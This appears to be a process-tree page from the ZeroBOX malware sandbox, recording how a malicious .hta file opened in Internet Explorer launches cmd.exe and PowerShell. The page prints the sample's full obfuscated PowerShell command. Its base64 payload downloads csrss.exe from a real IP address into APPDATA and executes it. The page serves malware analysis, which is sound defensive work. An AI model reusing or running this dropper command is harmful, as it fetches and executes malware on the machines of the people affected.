| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\wecashourdrgoodnewthingsgoodbusinessrealse.hta.html
2064
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2064 CREDAT:145409
  2188
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c poweRShELl -EX BYPAss -NOp -W 1 -c dEVIceCrEdEntIALdEPLoyMent ; IEX($(iEX('[SYsTEM.TEXT.enCOdiNG]'+[CHAR]0x3a+[cHaR]0X3A+'UTf8.getstriNG([sYStem.conVeRT]'+[cHaR]58+[chAr]58+'FroMBase64strINg('+[chAR]0X22+'JEczRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRXJkRUZJbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwZHJ6aGdQRFJCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMQ2Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlaUkhPTVdBLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2JDbXNIcW8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1wUnhhRik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAibnoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXVKSVhuYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHM0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8zNDIvY3Nyc3MuZXhlIiwiJEVuVjpBUFBEQVRBXGNzcnNzLmV4ZSIsMCwwKTtTdEFyVC1TTEVlUCgzKTtpTnZva0UtSXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHAr]0X22+'))')))"
    2700
    - powershell.exe poweRShELl -EX BYPAss -NOp -W 1 -c dEVIceCrEdEntIALdEPLoyMent ; IEX($(iEX('[SYsTEM.TEXT.enCOdiNG]'+[CHAR]0x3a+[cHaR]0X3A+'UTf8.getstriNG([sYStem.conVeRT]'+[cHaR]58+[chAr]58+'FroMBase64strINg('+[chAR]0X22+'JEczRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRXJkRUZJbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwZHJ6aGdQRFJCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMQ2Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlaUkhPTVdBLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2JDbXNIcW8sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1wUnhhRik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAibnoiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXVKSVhuYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHM0U6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8zNDIvY3Nyc3MuZXhlIiwiJEVuVjpBUFBEQVRBXGNzcnNzLmV4ZSIsMCwwKTtTdEFyVC1TTEVlUCgzKTtpTnZva0UtSXRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGNzcnNzLmV4ZSI='+[cHAr]0X22+'))')))"
      2760
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\pxtgqcfi.cmdline"
        2900
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESCF2E.tmp" "c:\Users\test22\AppData\Local\Temp\CSCCEC0.tmp"
        1700

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents